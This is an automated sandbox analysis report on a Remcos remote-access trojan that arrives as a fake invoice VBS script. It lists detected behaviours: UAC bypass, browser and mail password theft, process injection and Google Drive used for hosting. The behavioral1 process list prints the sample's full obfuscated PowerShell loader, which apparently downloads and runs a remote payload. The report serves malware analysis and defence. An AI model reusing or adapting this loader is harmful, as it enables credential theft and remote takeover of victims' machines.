Malware Analysis Report

2024-12-01 03:07

Sample ID 241111-qfq3zszbqn
Target 11112024_1259_detalhe_fatura_20241105pd.vbs.zip
SHA256 2afec0327c04e9ee4fd90742849759324292c2b905a5e4d4444bb08275b408ab
Tags
remcos remotehost collection credential_access discovery evasion rat stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

2afec0327c04e9ee4fd90742849759324292c2b905a5e4d4444bb08275b408ab

Threat Level: Known bad

The file 11112024_1259_detalhe_fatura_20241105pd.vbs.zip was found to be: Known bad.

Malicious Activity Summary

remcos remotehost collection credential_access discovery evasion rat stealer trojan

UAC bypass

Remcos

Remcos family

NirSoft MailPassView

NirSoft WebBrowserPassView

Detected Nirsoft tools

Blocklisted process makes network request

Uses browser remote debugging

Checks computer location settings

Legitimate hosting services abused for malware hosting/C2

Accesses Microsoft Outlook accounts

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of SetThreadContext

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Suspicious behavior: MapViewOfSection

Modifies registry key

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Enumerates system info in registry

Suspicious use of FindShellTrayWindow

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-11 13:12

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-11 13:12

Reported

2024-11-11 13:15

Platform

win7-20241023-en

Max time kernel

121s

Max time network

121s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\detalhe_fatura_20241105·pd.vbs"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\detalhe_fatura_20241105·pd.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#tervaderne Sejlklar Dispensative Synocreate Specialdepot #><#Rverhistorier Nonbreakable Warnas Prodders Prpositionsled #>$Dvekonsulenterne='Infiltrende';function Faglrereksaminernes($Militrpolitis){If ($host.DebuggerEnabled) {$Fiskerets++;$Rdbyerne=$Militrpolitis.'Length' - $Fiskerets} for ( $Episodial=4;$Episodial -lt $Rdbyerne;$Episodial+=5){$Yndlingsudtrykkets=$Episodial;$Checksumberegningen+=$Militrpolitis[$Episodial]}$Checksumberegningen}function husmandsbruget($Unvague){ .($Quersprung) ($Unvague)}$Unconfirmed=Faglrereksaminernes ' ariN Sa eVrnetSla,. Gisw IndEUnpubChefC BehL,elei ageHundnT leTDisp ';$Strandlooper=Faglrereksaminernes 'FulgMInteoUnl zmi.li ba lBel.lFriaa ,vi/coun ';$Bacillariaceous=Faglrereksaminernes 'AfgiTredilBunks upe1Paaf2V.lu ';$Alchimy='Park[SmdeN PoleDokbtOph .Proks CyceObliRSwirv aaniTyphCIntre.arbP A,to Elei SkeN P,atVildmNi raInteNKnbja RefgStoleRecoRIsla]Arch:Batt:F,scSovereDesucismeU Fo RMisaIAnsttFln YUn rpN nrRF isORamotT,eioRelicIraooJubjlInfl=Chin$.onmBForsaPersCspagiPr pLDokul BosaSc.prArc.i H pA Folc Mode .usOPsy,u.xpeSInte ';$Strandlooper+=Faglrereksaminernes 'Caes5Sven. Da,0Gaar Koll(cankWAl miSween SesdSf ro HakwSla,sMicr C agNUnheTLaan Une1Li j0Sind.Fuld0Pe,l;Hypo ImprWAci io.ernBo.e6Brdr4V rm; A o SilvxVanm6unde4 Obv; Che ChrerMo svFors: Non1N nc3Fleu1Shit.Nagg0Maco)Yndi SekuGac neFinec EntkIn qoMes /Tryk2Tvrd0 Ura1Woo 0 Con0Lok 1Part0Sy r1Brne ,hiFAr eiTrocrAb neEst f K.eo BesxSynd/Indk1Goor3Fen 1Gono..ogd0 Tam ';$Nondifficult76=Faglrereksaminernes ' .yaULionsS.alEPetiRSple-,igeaP nnGStareCautNSuggt dio ';$Beskrivelser=Faglrereksaminernes ' N dhSaa tHippt Batp uldsTrdo: ntu/Art /Hea.dFa rr HaeiAutovFu ieTare.Eng g ello Pr oAnalg MaclSpore wor.T lgc olyoRipem orr/StueuCondc,ymp?Pisse PouxAfl,pTe roCoenrBi ttstro=K radTa,roLnstwPhiln OvelAriso BevaRevedUdle&ChemiNe.rdpo,b=Dspe1 ProbhypnaIn,eZDoor0GradlAnfrZDismf GumeFremkSt ij AfdsSlagpYe,iVOperJFor.l St,qMeekySvo p rojyDaleHM,saF Bog2RowdYVaidiSlag_RuntuFir,VparkwIlliIMarkyBlue0Conti Bao ';$Bispevielse=Faglrereksaminernes 'Unpr>Gift ';$Quersprung=Faglrereksaminernes 'MillIVitreClasXTil ';$skudefuldes='Clysmian';$Skibsbestningerne='\Finansieringsreglen.Obj';husmandsbruget (Faglrereksaminernes 'Es e$KingGVrtslPseuO ypb udA EvaLVer :BundINel NM,lidF kssAtlaLMiniURepts Ubee plsdChorEUnwiSPara=Dr j$CheaEE,goNVeriv Co :MammA.nitpSpiopBrndDWithaSmukTbec aGlun+Biom$ olosSvinKPae IPe ibAlu sSup B Af,EAnsiS Vk.tK den Be.iReccnP ckgSik EUpaar Cenn tyrEGges ');husmandsbruget (Faglrereksaminernes ' St,$FlleGSu plTredOSubcbB ndafor lS jt:Ma.ku .jepInfaGGan,i ectrLetsD U aIudson M.lGBars=Stud$ lutb utoeKvansfjasK emer aksi TamvSyn EMaksL UnvSUdseESkraRThal.E.asSperlPBe,eLFo.miPlustfisk( imb$DdelBLrerIromaSDiskpUph,eTrauvUnd icanoeAural Sans UndEpost)Uros ');husmandsbruget (Faglrereksaminernes $Alchimy);$Beskrivelser=$upgirding[0];$Calami=(Faglrereksaminernes 'Mose$SkrugMeroLSvenoPikebJomfAKa aLAlgo:gipsbNe,ro LacNDe lDAceteCha sTeksLDe.egUdbytAfls= K.aN BuneMiliwSide-DebaoAnd bVa.sJFordEI,reCZinkTLivs Un s RenYDiscs ritT ulte Kopmmn,p.Krit$ CarUStennYnkscAgroo.nreNSanaF BimI FrdRVerdMHatheLithdVang ');husmandsbruget ($Calami);husmandsbruget (Faglrereksaminernes 'e pe$MaarBTrs oT.ddn Abed No eB.ansSonalVejvghexatInte.,ayoH avkeIndiaU ymdtilse S,vrRgtesCorr[L eh$svenNTrygoMa anSterdKarai MasfKlorfLoriiH.pncobtuuMololBrydtdev 7T ki6Ensn]Ph s=kvit$ PedSPhl,tCommrprogaF amnSvendnedslB wioHv loDestpNaa.eTy srbed, ');$Drollness=Faglrereksaminernes ' Rhe$Lym,BR,looConfnAfmad KaleFr ssV.ekl SprgChritcal..ForpDF iko kifwLurrnIn elBibcodereaSpatdInfeF CatiStarl Fore Ina(Nonr$ asyBHeare.lumsNyttkAudirKonsiNo pv L leImmilStunsHe neStemrEver,Afmi$Hjn E .omr Vany aat onrh Refr BiooTabud uldeY.utgPrepeud lnca hebordrLuc.aGaertRepli ,oevRecueOver)vet. ';$Erythrodegenerative=$Indslusedes;husmandsbruget (Faglrereksaminernes '.rne$ kvaGBir,LU,gao Ma bS orA haeLBibl: JibasponDAirlmBefoi rayRPo uA TvilStipSSkurUSmaaN,oshi K rF OveO blirInd,mJamisG os=Golk(KatoTb grEFamiSMarcTC.to- StuPKaffap osTLufthF gb Told$epene ecrrAkkiyStiftEr tHheatrCrewoVerid KavEJuragRav eTandnSo,vEHoldR F nA T nTEtabi FaiVS.rbESyph)unde ');while (!$Admiralsuniforms) {husmandsbruget (Faglrereksaminernes 'Mult$Sophg paulurocoI,subTepiaBevilMego:EfteDStyri atesApp kFradk ortaA ndpDyrta incc.egriSerpt Op efemitChuteDamen DessAnke=.cce$SkibtSnedrChafuPas eUnap ') ;husmandsbruget $Drollness;husmandsbruget (Faglrereksaminernes ' Ac Sbel.T C oA I fr KurtA.kl-CelisNikklBromE.roneAnespTele Brn4opt ');husmandsbruget (Faglrereksaminernes 'S,rg$Bla,GBedmlCoolo rrebTilrA Ejal Pac:C,mpAAfstDR.bsmPe,fIAfbiRH,ala CasL Hoes U eU dmynSaltI eawfDo,bOMiddRPhy MbefaSGr s= fv( MirT IntELampS AppTSpi - DegpDem A JocTCr sH Si, Bio $Col ESuper L nYUdg.TNonohMos,RDisto avtdMettE NemG loeGimmnWeekeHardRassoAAfgaTPr bIPenaVReprE Zir)bee ') ;husmandsbruget (Faglrereksaminernes 'Taag$ichtGBesmlUdd.oForsBPilaaHomol Ejs: ontBUnt LB atOForocZoogk ba.A MisDDipleMassr erd=Spar$PhotGBurkLBaltoVol BDebeAB lsLIndt:c onjFnugokap.m HasfBedrRRefeUMealkVesiLHypsoProts,epeTTavee,lubr St.+ com+ ha% Mo $FascU RelpTe,aG pipIAfkorAa sDTyfoIFauvnG regBogk. Epac LexOE.chUBracNJenntDe o ') ;$Beskrivelser=$upgirding[$Blockader]}$Understemmer=312115;$Leafiest15=31157;husmandsbruget (Faglrereksaminernes 'Send$,pargTerpLTalgo HisbFr ta bilLFila:Siess SupuPargpInd P PrirMyldiSubsmPhoteLegiRVverI uronVentgUdsi sta.=Byba SketGStarEK,altProp- LblCPostoQuinnDarttWalleRayaNVinrtSkr Scru$P trEs mir A byRoomtl.seHturbRHippOPatrdhalvEkbssg GenESwinNUs.fESer.rSym.ATrigT eni swavConieSal ');husmandsbruget (Faglrereksaminernes 'Stem$Clung istlFl,soAntibRefoaCounl yke:rrf AT.amuOptispen tSt krO tba pirl.ortoPhotp.orciKon tV,llhOlioeAto.cErobilysensjleaRekoe Sur .rch=Indd R s[TollS OveyKvi.sUn vt Udse Po mSamm.landC frooSubcnW atvRepreNonprPosttDist]Gard:A.ab:An iFUdhurTreeotu nm tyrBWoodaS nssAflgeShog6Evan4Sq.iSFrent,dskr Beni DkknIrregHuch( el$grssS NonuHo,epE trp edlrTmtbiSycomTeste ushrBrohiEscrnPramgYend)S ef ');husmandsbruget (Faglrereksaminernes 'Var $LawbgAddeL opaOEnkeBEspaAFyldLKant:Oilpk IntaUns mHyklmDatae marRGeneh d.sE HutRCompRVaa EGradsBrom I.dp=Br b Sl [Toi SAnemyVivis D.sTSmaaE RelmAger.RegrTBagteBohmxmuniT Van.De iESebkNMor.C hakO HanDSiloiSuriNUdbeg an] Hoe:,icr:E.paaCo pSSto cJaimiOkseI Bol. .raG OppESowaTKostsBlvetak iRFagfi BloNResoGRoto(Frke$AkkuaAnstuOb eSFroptAm rRZ,nta S iLVldeO.yonP IrrIAfstTPe.sHTandERu.fC al iT.ngNSysta TarE Eco) ha ');husmandsbruget (Faglrereksaminernes 'Un e$ T nGRe.uL LocoPan b .abaSlutlCast:H ltAPre.S TreT Elir,lepoDow lUncoOR kkgSkrk=Flor$ ranKMaria B om EvaMMispeLnkoRf.glhTekneUdk,R nfor,emoEKvalsUdsa. f mS elrUMastbOleaSFjleTAfvirSbehIHav.NMandGGri (Typ.$AfkluCirkNbegydTwi,EThorrC.ess,avsTPlanE eatMHypomB tae FalRTvrm, Dam$KoallBogsESterA sblf,uraI SaleBorgS MidTForv1 ip5Supe)Mini ');husmandsbruget $Astrolog;"

Network

Files

C:\Users\Admin\AppData\Local\Temp\CabBBF1.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

memory/1740-20-0x000007FEF55AE000-0x000007FEF55AF000-memory.dmp

memory/1740-21-0x000000001B6F0000-0x000000001B9D2000-memory.dmp

memory/1740-24-0x000007FEF52F0000-0x000007FEF5C8D000-memory.dmp

memory/1740-23-0x0000000002000000-0x0000000002008000-memory.dmp

memory/1740-22-0x000007FEF52F0000-0x000007FEF5C8D000-memory.dmp

memory/1740-25-0x000007FEF52F0000-0x000007FEF5C8D000-memory.dmp

memory/1740-26-0x000007FEF52F0000-0x000007FEF5C8D000-memory.dmp

memory/1740-27-0x000007FEF52F0000-0x000007FEF5C8D000-memory.dmp

memory/1740-28-0x000007FEF55AE000-0x000007FEF55AF000-memory.dmp

memory/1740-29-0x000007FEF52F0000-0x000007FEF5C8D000-memory.dmp

memory/1740-30-0x000007FEF52F0000-0x000007FEF5C8D000-memory.dmp

memory/1740-31-0x000007FEF52F0000-0x000007FEF5C8D000-memory.dmp

memory/1740-32-0x000007FEF52F0000-0x000007FEF5C8D000-memory.dmp

memory/1740-33-0x000007FEF52F0000-0x000007FEF5C8D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-11 13:12

Reported

2024-11-11 13:15

Platform

win10v2004-20241007-en

Max time kernel

148s

Max time network

149s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\detalhe_fatura_20241105·pd.vbs"

Signatures

Remcos

rat remcos

Remcos family

remcos

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A

Detected Nirsoft tools

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

NirSoft MailPassView

Description Indicator Process Target
N/A N/A N/A N/A

NirSoft WebBrowserPassView

Description Indicator Process Target
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Windows\SysWOW64\msiexec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3016 set thread context of 916 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 3016 set thread context of 1896 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 3016 set thread context of 2372 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3552 wrote to memory of 3272 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3552 wrote to memory of 3272 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3224 wrote to memory of 3016 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\msiexec.exe
PID 3224 wrote to memory of 3016 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\msiexec.exe
PID 3224 wrote to memory of 3016 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\msiexec.exe
PID 3224 wrote to memory of 3016 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\msiexec.exe
PID 3016 wrote to memory of 4356 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\cmd.exe
PID 3016 wrote to memory of 4356 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\cmd.exe
PID 3016 wrote to memory of 4356 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\cmd.exe
PID 4356 wrote to memory of 1148 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4356 wrote to memory of 1148 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4356 wrote to memory of 1148 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3016 wrote to memory of 2124 N/A C:\Windows\SysWOW64\msiexec.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 3016 wrote to memory of 2124 N/A C:\Windows\SysWOW64\msiexec.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2124 wrote to memory of 3184 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2124 wrote to memory of 3184 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 3016 wrote to memory of 1440 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 3016 wrote to memory of 1440 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 3016 wrote to memory of 1440 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 3016 wrote to memory of 916 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 3016 wrote to memory of 916 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 3016 wrote to memory of 916 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 3016 wrote to memory of 916 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 3016 wrote to memory of 1864 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 3016 wrote to memory of 1864 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 3016 wrote to memory of 1864 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 3016 wrote to memory of 4068 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 3016 wrote to memory of 4068 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 3016 wrote to memory of 4068 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 3016 wrote to memory of 1896 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 3016 wrote to memory of 1896 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 3016 wrote to memory of 1896 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 3016 wrote to memory of 1896 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 3016 wrote to memory of 2372 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 3016 wrote to memory of 2372 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 3016 wrote to memory of 2372 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 3016 wrote to memory of 2372 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2124 wrote to memory of 2236 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2124 wrote to memory of 2236 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2124 wrote to memory of 2236 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2124 wrote to memory of 2236 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
